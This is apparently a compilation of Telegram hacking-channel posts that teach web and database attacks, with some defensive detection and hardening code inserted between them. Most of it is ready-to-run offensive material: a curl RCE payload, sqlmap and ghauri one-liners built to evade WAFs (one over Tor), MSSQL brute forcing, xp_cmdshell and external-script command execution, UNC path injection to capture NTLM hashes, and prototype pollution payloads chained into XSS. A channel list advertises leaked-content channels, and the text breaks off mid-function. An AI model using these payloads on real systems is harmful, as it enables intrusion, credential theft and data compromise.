Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
This can lead to different reactions from the server, such as:
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to severe security vulnerabilities, such as Remote Code Execution (RCE).
━━━━━━━━━━━━━━━━━━
Impact on Web Frameworks (e.g., Laravel)
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
•Database credentials.
•Environment variables.
•File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
━━━━━━━━━━━━━━━━━━
Practical Examples
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
curl -X POST http://example.com/
The server might respond with:
HTTP/1.1 405 Method Not Allowed
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when processing an unexpected request method, it might return:
HTTP/1.1 500 Internal Server Error
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
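As an added example (not code from the original post), here is a minimal Node.js request router showing the defensive side of the three reactions above: an unexpected method gets a 405 with an Allow header, and a handler that fails gets a generic 500 while the exception text stays in the server log. The route table, handler bodies and the simulated database error are constructed for illustration.

```javascript
// Added example, not code from the original post. Route table, handler
// bodies and the simulated database error are constructed for illustration.

// Which methods each path accepts, and what the handler does (constructed).
const ROUTES = {
  "/": {
    GET: () => ({ status: 200, body: "<html>home</html>" }),
  },
  "/delete_user": {
    DELETE: () => {
      // Stands in for a failing DB call; the text mimics the Laravel debug
      // output quoted in the post and must never reach the client.
      throw new Error("SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'");
    },
  },
};

// Pure request handler: returns {status, headers, body}. `serverLog` collects
// what an operator should see; nothing from it is echoed to the client.
function handle(method, path, serverLog = []) {
  const route = ROUTES[path];
  if (!route) return { status: 404, headers: {}, body: "Not Found" };

  const handler = route[method];
  if (!handler) {
    // RFC 9110 requires a 405 to carry an Allow header listing valid methods.
    return {
      status: 405,
      headers: { Allow: Object.keys(route).join(", ") },
      body: "Method Not Allowed",
    };
  }

  try {
    const out = handler({ method, path });
    return { status: out.status, headers: out.headers || {}, body: out.body };
  } catch (err) {
    // Debug detail stays server-side; the client gets a generic message.
    serverLog.push(`${method} ${path}: ${err.message}`);
    return { status: 500, headers: {}, body: "Internal Server Error" };
  }
}

// Markers an operator can grep responses for to confirm debug output is off.
const DEBUG_MARKERS = [/SQLSTATE\[/, /APP_DEBUG/, /Stack trace/i, /\.env\b/];

function leaksDebugInfo(response) {
  return DEBUG_MARKERS.some((re) => re.test(response.body));
}

// Probe one path with several methods and report status plus leak verdict.
function probe(path, methods = ["GET", "POST", "PUT", "DELETE"]) {
  const log = [];
  return methods.map((m) => {
    const r = handle(m, path, log);
    return { method: m, status: r.status, leaks: leaksDebugInfo(r) };
  });
}
```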
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
A Simple Yet Effective Way to Find SQLI Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here’s an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
━━━━━━━━━━━━━━━━━━
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable.
━━━━━━━━━━━━━━━━━━
3. Manual Testing with cURL
curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
•The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
•Modify headers like User-Agent to mimic real traffic.
━━━━━━━━━━━━━━━━━━
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Uses the most effective SQL injection techniques.
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Prevents certain characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
━━━━━━━━━━━━━━━━━━
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
━━━━━━━━━━━━━━━━━━
Conclusion
✅ Wayback Machine helps find old endpoints.
✅ Manual payloads help confirm basic SQL injection.
✅ Ghauri & SQLMap provide automation with WAF bypass techniques.
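From the detection side, as an added example that is not part of the original post: the sleep probe in step 2 and the evasion transforms used in steps 4 and 5 (the /**/ prefix, URL encoding, random case) all leave a recognisable shape in the query string. The code below decodes stacked URL encoding, collapses inline comments and matches the normalised value against a few rules, run over constructed access-log lines.

```javascript
// Added example, not code from the original post. Detection logic for the
// payload and evasion tricks the post describes, run over constructed
// access-log lines; nothing here is a real log.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512',
  // The post's sleep probe, URL-encoded once (sqlmap charencode).
  '10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /page.php?id=1%27%20OR%20if(now()%3Dsysdate()%2CSLEEP(8)%2C0)%20--%20- HTTP/1.1" 200 512',
  // space2comment plus randomcase: spaces became /**/, keyword case mixed.
  '10.0.0.7 - - [01/Jan/2025:10:00:09 +0000] "GET /page.php?id=1/**/aNd/**/SlEeP(5)--%20- HTTP/1.1" 200 512',
  // Double URL-encoded tautology (1' OR 1=1) that a single decode misses.
  '10.0.0.9 - - [01/Jan/2025:10:00:10 +0000] "GET /page.php?id=%2531%2527%2520%254f%2552%25201%253d1 HTTP/1.1" 403 0',
  // Benign request that merely contains the word "sleep".
  '10.0.0.3 - - [01/Jan/2025:10:00:11 +0000] "GET /search?q=sleep%20training HTTP/1.1" 200 2048',
];

// Undo up to `rounds` layers of URL encoding; stop when nothing changes.
function decodeLayers(s, rounds = 3) {
  let cur = s;
  for (let i = 0; i < rounds; i++) {
    let next;
    try { next = decodeURIComponent(cur.replace(/\+/g, " ")); } catch { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Decode, turn /**/ comments back into spaces, squeeze whitespace, lowercase.
function normalize(value) {
  return decodeLayers(value).replace(/\/\*.*?\*\//g, " ").replace(/\s+/g, " ").toLowerCase();
}

const RULES = [
  { name: "time-based sleep", re: /\b(sleep|benchmark|pg_sleep|waitfor delay)\s*\(/ },
  { name: "now()=sysdate() probe", re: /now\s*\(\s*\)\s*=\s*sysdate\s*\(\s*\)/ },
  { name: "tautology", re: /(['"]|\d)\s*or\s+['"]?\d+['"]?\s*=\s*['"]?\d+/ },
  { name: "trailing -- comment", re: /--[\s-]*$/ },
];

// Pull the query string out of one combined-format log line and test each
// parameter value against the rules. Returns null when nothing matched.
function analyzeLine(line) {
  const m = line.match(/"[A-Z]+ (\S+) HTTP\//);
  if (!m) return null;
  const qi = m[1].indexOf("?");
  if (qi < 0) return null;
  const findings = [];
  for (const pair of m[1].slice(qi + 1).split("&")) {
    const eq = pair.indexOf("=");
    const param = eq < 0 ? pair : pair.slice(0, eq);
    const value = normalize(eq < 0 ? "" : pair.slice(eq + 1));
    for (const rule of RULES) {
      if (rule.re.test(value)) findings.push({ param, rule: rule.name });
    }
  }
  return findings.length ? { client: line.split(" ")[0], findings } : null;
}

function scanLog(lines) {
  return lines.map(analyzeLine).filter(Boolean);
}
```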
━━━━━━━━━━━━━━━━━━
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
Here is a more optimized one-liner for finding SQL injection vulnerabilities while bypassing WAF efficiently:
gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tamper="between,space2comment,charencode" --level=5 --risk=3 --batch --threads=10 --time-sec=5
More aggressive alternative for bypassing WAF with Tor and Hex encoding:
gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tor --proxy="socks5://127.0.0.1:9050" --tamper="space2comment,charencode,randomcase" --hex --batch --threads=5 --timeout=10
Try it and see the results!
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1️⃣ Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
•This query retrieves all archived URLs of example.com from Wayback Machine.
•*.example.com/* searches for all subdomains and pages.
•collapse=urlkey removes duplicate URLs.
•output=text formats the output as plain text.
•fl=original extracts only the original URLs without extra metadata.
━━━━━━━━━━━━━━━━━━
2️⃣ Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
•Retrieves a security report for example.com from VirusTotal.
•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
•Replace YOUR_API_KEY with a valid VirusTotal API key.
━━━━━━━━━━━━━━━━━━
3️⃣ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
•Queries AlienVault OTX for URLs associated with domain.com.
•limit=500 retrieves up to 500 URLs per page.
•page=1 fetches the first page of results.
━━━━━━━━━━━━━━━━━━
4️⃣ Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
•Fetches all archived URLs of example.com from Wayback Machine.
•Saves the output to out.txt for further processing.
━━━━━━━━━━━━━━━━━━
5️⃣ Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1-cat out.txt → Reads the archived URLs from out.txt.
2-uro → Deduplicates and normalizes URLs.
3-grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:
•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi
━━━━━━━━━━━━━━━━━━
🔍 Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
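As an added example (not part of the original post), a stricter version of the step-5 filter. The grep matches an extension anywhere in the URL, so .sh also hits index.shtml, .key hits /keyboard/ and .pdf hits a query parameter. This filter parses each URL, looks only at the final path segment's extension, and dedups on scheme, host and path, which approximates what uro does for query-string variants (it is not uro's algorithm). The extension set is a subset of the post's list and the archived URLs are constructed.

```javascript
// Added example, not code from the original post. Sample URLs are constructed.
// Subset of the extensions from the post's grep, plus the two-part tar.gz.
const SENSITIVE_EXT = new Set([
  "sql", "db", "backup", "bak", "xls", "xlsx", "doc", "docx", "pdf", "txt",
  "csv", "zip", "tar", "gz", "tgz", "tar.gz", "rar", "7z", "pem", "crt", "key",
  "asc", "pub", "config", "ini", "yaml", "yml", "log", "exe", "dll", "apk", "msi",
]);

// Returns {key, ext, url} when the URL's path ends in a sensitive extension,
// otherwise null. Only the last path segment is examined, never the query.
function classifyUrl(raw) {
  let u;
  try { u = new URL(raw); } catch { return null; }
  const base = u.pathname.split("/").pop().toLowerCase();
  let ext = null;
  if (base.endsWith(".tar.gz")) {
    ext = "tar.gz";
  } else {
    const dot = base.lastIndexOf(".");
    if (dot > 0 && dot < base.length - 1) ext = base.slice(dot + 1);
  }
  if (!ext || !SENSITIVE_EXT.has(ext)) return null;
  return { key: `${u.protocol}//${u.host}${u.pathname}`, ext, url: raw };
}

// Keeps the first URL seen for each scheme+host+path (query variants collapse).
function filterSensitive(urls) {
  const seen = new Map();
  for (const raw of urls) {
    const hit = classifyUrl(raw.trim());
    if (hit && !seen.has(hit.key)) seen.set(hit.key, hit);
  }
  return [...seen.values()];
}

// Constructed sample of what the cdx query in step 4 might return.
const SAMPLE_URLS = [
  "http://example.com/backup/db.sql",
  "http://example.com/backup/db.sql?ver=2",        // same path, dropped
  "http://example.com/index.shtml",                // grep's .sh false positive
  "http://example.com/keyboard/layout",            // grep's .key false positive
  "http://files.example.com/reports/q1.xlsx",
  "http://example.com/releases/site.tar.gz",
  "http://example.com/api/users?format=.pdf",      // extension only in query
];
```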
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
🔹Microsoft SQL Server Abuse Techniques 🔹
👋 Hello, friends!
I often discuss Microsoft SQL Server (MSSQL) abuse in interviews, and surprisingly, many people have only a superficial understanding of it. However, MSSQL is widely used in corporate networks, and if misconfigured, it can become a valuable entry point for attackers.
In this post, I have gathered the main MSSQL abuse techniques to help you:
✅ Understand possible attack vectors.
✅ Prepare for interviews.
✅ Organize your knowledge.
━━━━━━━━━━━━━━━━━━
📖 MSSQL Basics
Microsoft SQL Server (MSSQL) is a relational database management system (DBMS) developed by Microsoft, commonly used in corporate environments for storing and processing data.
🔹 Main Components:
✅ Database Engine – Stores, processes, and manages data.
✅ SQL Server Agent – Automates tasks (e.g., backups).
✅ SQL Server Browser – Helps clients find MSSQL instances.
✅ SSIS (Integration Services) – Handles data integration.
✅ SSRS (Reporting Services) – Generates reports.
✅ SSAS (Analysis Services) – Provides analytics and data processing.
🔹 User Roles in MSSQL:
🔸 sysadmin – Full privileges on the server.
🔸 db_owner – Full rights within a specific database.
🔸 db_datareader – Read-only access.
🔸 db_datawriter – Ability to modify data.
🔸 public – Default role for all users (may have more permissions than expected).
🔹 Authentication Methods:
🔹 Windows Authentication – Uses NTLM/Kerberos for domain-based authentication.
🔹 SQL Authentication – Uses local MSSQL accounts (e.g., sa, custom user logins).
🔍 Detecting MSSQL on the Network
Before attacking, you must first locate MSSQL instances.
🔹 PowerUpSQL (PowerShell)
Get-SQLInstanceDomain
🔹 Nmap
nmap -p 1433 --script ms-sql-info <IP>
🔹 Metasploit
use auxiliary/scanner/mssql/mssql_ping
🔹 go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
🔑 Gaining Access to MSSQL
🔹 Brute Force Attack
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt
━━━━━━━━━━━━━━━━━━
🚀 Privilege Escalation: Local Admin → Sysadmin
The main MSSQL process (sqlservr.exe) runs under a Windows account with limited privileges, but inside SQL Server, it is often assigned sysadmin by default. Compromising this service can lead to full domain control!
🔹 Step 1: Find Local MSSQL
Get-SQLInstanceLocal
🔹 Step 2: Impersonate SQL Service Accounts
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name
🎯 Executing OS Commands via MSSQL
If an attacker gains access to MSSQL, they can execute Windows commands using:
🔹 CLR (Common Language Runtime) Assembly
Allows executing .NET code (C#, VB.NET) inside MSSQL.
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
🔹 OLE Automation Procedures
Allows running COM objects from T-SQL.
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"
🔹 xp_cmdshell (Built-in Stored Procedure)
Executes Windows commands directly from MSSQL.
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"
━━━━━━━━━━━━━━━━━━
🔚 Conclusion
MSSQL misconfigurations can lead to serious security risks, including:
⚠ Unauthorized access to databases.
⚠ Privilege escalation to sysadmin.
⚠ Remote code execution (RCE).
⚠ Lateral movement across corporate networks.
🔍 Understanding these techniques is essential for security professionals to prevent attacks and secure corporate environments. Stay safe! 🚀
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
MSSQL Exploitation Techniques
🔹 External Scripts (Python/R) – Allows executing Python & R code in Microsoft SQL Server.
-- Execute Python script
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-- Execute R script
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
PowerUpSQL Commands:
# Remote Execution
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
# Local Execution
Get-SQLInstanceLocal | Invoke-SQLOSCmdPython -Verbose -Command "whoami"
Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"
🔹 UNC Path Injection – Extracts NetNTLM hashes via SMB.
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';
PowerUpSQL Command:
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost
🔹 Lateral Movement via Linked Servers
Linked Servers allow connections to other SQL Servers, MySQL, Oracle, PostgreSQL, and more.
-- List Linked Servers
EXEC sp_linkedservers;
-- Execute command on remote server
EXEC ('whoami') AT [LINKED_SERVER];
PowerUpSQL Commands:
# Find linked servers
Get-SQLServerLink -Instance YourInstance -Verbose
# Check privileges on remote server
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose
# Enable xp_cmdshell on linked server
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"
🔥 That's all, friends!
Happy hacking and see you next time! 🚀
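From the defender's side, as an added example that is not code from either MSSQL post: every primitive the two posts walk through (xp_cmdshell, OLE automation, CLR, external scripts, UNC paths that trigger outbound SMB, EXEC ... AT on linked servers) shows up as statement text in SQL Audit or Extended Events captures. The scanner below normalises T-SQL, including the doubled quotes inside an EXEC ('...') AT wrapper, and matches it against rules; the audit records are constructed.

```javascript
// Added example, not code from the original posts. Audit records below are
// constructed in the shape {login, stmt} that a SQL Audit or Extended Events
// batch capture would provide.
const SAMPLE_AUDIT = [
  { login: "app_svc", stmt: "SELECT name FROM sys.databases" },
  { login: "sa", stmt: "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" },
  { login: "sa", stmt: "EXEC xp_cmdshell 'whoami'" },
  { login: "report_user", stmt: "EXEC   sp_execute_external_script @language = N'Python', @script = N'print(1)'" },
  // Linked-server wrapper: inner quotes are doubled, hiding it from a naive grep.
  { login: "sa", stmt: "EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL02]" },
  { login: "etl_user", stmt: "EXEC master..xp_dirtree '\\\\10.0.0.99\\share'" },
  { login: "app_svc", stmt: "EXEC sp_OACreate 'WScript.Shell', @obj OUTPUT" },
  { login: "app_svc", stmt: "EXECUTE sp_executesql N'SELECT 1'" },
];

// T-SQL doubles single quotes inside string literals, so unescape them first,
// then squeeze whitespace and lowercase so the rules see one canonical form.
function normalizeTsql(stmt) {
  return stmt.replace(/''/g, "'").replace(/\s+/g, " ").toLowerCase();
}

const RULES = [
  { name: "enable xp_cmdshell", sev: 3, re: /sp_configure 'xp_cmdshell', 1/ },
  { name: "xp_cmdshell execution", sev: 3, re: /\bxp_cmdshell\b/ },
  { name: "external script (Python/R)", sev: 3, re: /\bsp_execute_external_script\b/ },
  { name: "OLE automation", sev: 3, re: /\bsp_oa(create|method|getproperty)\b/ },
  { name: "CLR assembly load", sev: 3, re: /create assembly|sp_configure 'clr enabled', 1/ },
  { name: "UNC path to external host", sev: 2, re: /\\\\(\d{1,3}\.){3}\d{1,3}\\|\\\\[a-z0-9.-]+\\/ },
  { name: "remote exec via linked server", sev: 2, re: /\bexec(ute)?\s*\(.*\)\s+at\s+\[?[a-z0-9_.-]+\]?/ },
  { name: "show advanced options enabled", sev: 1, re: /sp_configure 'show advanced options', 1/ },
];

// Returns one entry per flagged statement with the matched rule names and
// the highest severity among them (3 = code execution primitive).
function auditMssql(events) {
  const hits = [];
  for (const ev of events) {
    const text = normalizeTsql(ev.stmt);
    const matched = RULES.filter((r) => r.re.test(text));
    if (matched.length === 0) continue;
    hits.push({
      login: ev.login,
      rules: matched.map((r) => r.name),
      severity: Math.max(...matched.map((r) => r.sev)),
      stmt: ev.stmt,
    });
  }
  return hits;
}
```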
#RedTeam #MSSQL #BugBounty #CyberSecurity
Prototype Pollution Vulnerability
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
━━━━━━━━━━━━━━━━━━
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
let userInfo = {
"username": "admin",
"password": "1qaz2wsx3edc",
"email": "admin@victim.com"
};
To access properties of this object, we can use two methods:
1-Dot notation:
userInfo.username;
2-Bracket notation:
userInfo["username"];
One of these methods is used for polluting the prototype of an object.
━━━━━━━━━━━━━━━━━━
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
var name = "Arya";
console.log(name.__proto__);
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
a.__proto__;
Exploiting Prototype Pollution
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
━━━━━━━━━━━━━━━━━━
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1️⃣ Dot Notation Approach
http://target.com/?__proto__.arya=arya
2️⃣ Bracket Notation Approach
http://target.com/?__proto__[arya]=arya
Bypassing WAF (Web Application Firewall)
If the WAF blocks the __proto__ keyword, we can use constructor-based techniques:
/?constructor.prototype.arya=arya
/?constructor[prototype][arya]=arya
If the WAF still blocks requests, we can use nested obfuscation techniques:
/?__pro__proto__to__[arya]=arya
/?__pro__proto__to__.arya=arya
/?constconstructorructor[protoprototypetype][arya]=arya
/?constconstructorructor.protoprototypetype.arya=arya
Confirming the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
let test = {};
console.log(test.arya); // Output: "arya"
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
━━━━━━━━━━━━━━━━━━
Conclusion
Prototype Pollution is a powerful vulnerability that, when combined with other exploits, can lead to serious security risks. Understanding how JavaScript's prototype system works is essential for both attackers and defenders to identify and mitigate such threats effectively.
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
Welcome, everyone,
This is a collection of our channels that may help you on your journey in the tech field, and in cybersecurity in particular.
@end_k
Our joint channel, featuring live streams and unique, unprecedented content.
@iiLinux
A general channel publishing general tech content, with a focus on Linux tutorials.
@GlobalRedHat
The official community of red-hat hackers.
@k7ali_linux
A channel dedicated to Kali Linux tutorials, presented in a different and distinctive way.
@ExploitQuest
A channel focused on discovering and exploiting vulnerabilities, together with its distinctive tutorials.
@EgyptianshieldTOOLS
A channel dedicated to the tools used in programming and cybersecurity.
@iiMrDark
A channel offering content about leaks and software.
@Wa3i_Tech
A channel raising cybersecurity awareness through simplified explanations.
@codearabs
A channel specializing in leaked courses from well-known companies in technical fields.
@Egyshield
A channel specializing in tutorials and tech news, specifically in programming and cybersecurity.
@Bad_Rabbit_Team
The Bad Rabbit channel: a channel specializing in cyber attacks, offering practical tutorials on penetration testing, vulnerability analysis, and offensive tooling.
@GlobalRedTeam
The official community of Global Red Team.
@darkcsc
A channel dedicated to computer science, with tutorials about computing in general.
A Real-World Example of Prototype Pollution Exploitation
A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype via the URL.
To test for Prototype Pollution, they started with the following request:
https://target.com/?__proto__.arya=arya
However, the WAF (Web Application Firewall) blocked this attempt.
To bypass it, they got creative and modified the payload:
https://target.com/?__pro__proto__to__.arya=arya
To confirm if the vulnerability was present, they opened the browser console and created an empty object:
test = {};
test.arya; // Outputs: "arya"
Since the property (arya) was successfully injected into the object, Prototype Pollution was confirmed!
But Prototype Pollution alone has no significant impact, so they needed to chain it with another vulnerability—like XSS—to escalate the attack.
━━━━━━━━━━━━━━━━━━
Leveraging Web Archives for Further Exploitation
While analyzing the target’s Web Archive, the hacker noticed many URLs contained # followed by useful information.
Reminder:
Everything after # in a URL is not sent to the server but is processed directly by the DOM, meaning the WAF won’t block it!
The hacker decided to test this method:
https://target.com/#__proto__.arya=arya
By following the same console-based verification, they confirmed the attack worked.
━━━━━━━━━━━━━━━━━━
Turning Prototype Pollution into XSS
Through behavior analysis, they discovered that injected values were being inserted into the style attribute of HTML elements.
Now, they could escalate this attack by chaining Prototype Pollution with XSS:
https://target.com/#__proto__[onload]=alert(1)
━━━━━━━━━━━━━━━━━━
Prototype Pollution - Server Side
Prototype Pollution isn’t just a client-side issue—it can also be exploited on the server side.
If a Node.js server uses libraries that improperly merge user input into objects (e.g., lodash, merge, deepExtend, setValue), it becomes vulnerable!
Example of a Vulnerable Node.js Code
const _ = require('lodash');
const express = require('express');
const app = express();
app.use(express.json());
app.post('/update', (req, res) => {
let defaultConfig = { role: 'user' };
let userConfig = req.body;
let finalConfig = _.merge({}, defaultConfig, userConfig);
res.json(finalConfig);
});
app.listen(3000, () => console.log("Server running on port 3000"));
Where’s the Problem?
The function _.merge() merges user input with the defaultConfig object.
If an attacker sends a payload with __proto__, they can modify the prototype of all objects in the application!
━━━━━━━━━━━━━━━━━━
Attack Scenario (Exploiting the Above Code)
The hacker discovers an API endpoint /update that sets user roles.
They send the following malicious request:
POST /update HTTP/1.1
Host: target.com
Content-Type: application/json
{
"__proto__": { "isAdmin": true }
}
What Happens?
Since __proto__ affects Object.prototype, every new object created in the application will automatically have isAdmin = true!
Conclusion
Prototype Pollution is a serious vulnerability that can be exploited both client-side and server-side.
When combined with other vulnerabilities (like XSS, RCE, or privilege escalation), it can have a critical impact.
Developers should use secure coding practices and avoid unsafe object merging in applications.
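As an added example (not the post's code), the following shows both halves of this thread in runnable form: a recursive merge with the same defect as the lodash-style Express handler above, the same merge hardened, and a small query-string setter that shows why ?__proto__[arya]=arya from the client-side testing section lands on Object.prototype. The payloads, the /update simulation and all inputs are constructed; the hardened versions compare each key exactly against the reserved names rather than stripping substrings, which is why the nested __pro__proto__to__ form does not get past them.

```javascript
// Added example, not code from the original posts. All inputs are constructed.
const BLOCKED = new Set(["__proto__", "constructor", "prototype"]);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Vulnerable deep merge: walks every enumerable key of src, including an own
// "__proto__" key produced by JSON.parse. target["__proto__"] resolves to
// Object.prototype, so the recursion writes into the shared prototype.
function unsafeMerge(target, src) {
  for (const key in src) {
    const val = src[key];
    if (val && typeof val === "object") {
      if (!target[key] || typeof target[key] !== "object") target[key] = {};
      unsafeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened deep merge: own keys only, reserved names rejected, and recursion
// only into objects that are the target's own properties.
function safeMerge(target, src) {
  for (const key of Object.keys(src)) {
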